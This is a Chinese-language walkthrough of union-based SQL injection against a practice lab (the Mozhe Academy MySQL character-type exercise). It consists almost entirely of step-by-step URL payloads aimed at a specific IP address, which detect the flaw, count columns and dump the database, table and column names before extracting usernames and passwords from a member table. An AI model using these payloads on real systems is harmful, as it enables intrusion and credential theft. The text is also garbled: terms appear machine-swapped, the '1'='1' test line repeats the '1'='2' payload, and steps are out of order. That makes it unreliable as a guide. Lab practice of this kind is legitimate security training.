Web安全-SQL注入之团结查询注入

声明

环境

墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符型)
判断是否存在漏洞

1. http://124.70.64.48:42937/new_list.php?id=tingjigonggao' and '1'='2'--+

复制代码

and '1'='1'正常

1. http://124.70.64.48:42937/new_list.php?id=tingjigonggao' and '1'='2'--+

复制代码

and '1'='2'堕落，存在字符型注入漏洞
判断字段数

1. http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,3,4 --+

复制代码

字段数判断为4

爆数据库

1. http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,database(),4 --+

复制代码

爆出数据库mozhe_discuz_stormgroup

1. http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name = 'stormgroup_member'--+

复制代码

爆表

1. http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema = 'mozhe_discuz_stormgroup'--+

复制代码

爆出数据表notice和stormgroup_member，分析stormgroup_member表包罗账号密码

爆字段

1. http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name = 'stormgroup_member'--+

复制代码

爆出表stormgroup_member的全部字段id、name、password、status

爆数据

1. http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(id,',',name,',',password),4 from stormgroup_member where id=1--+

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。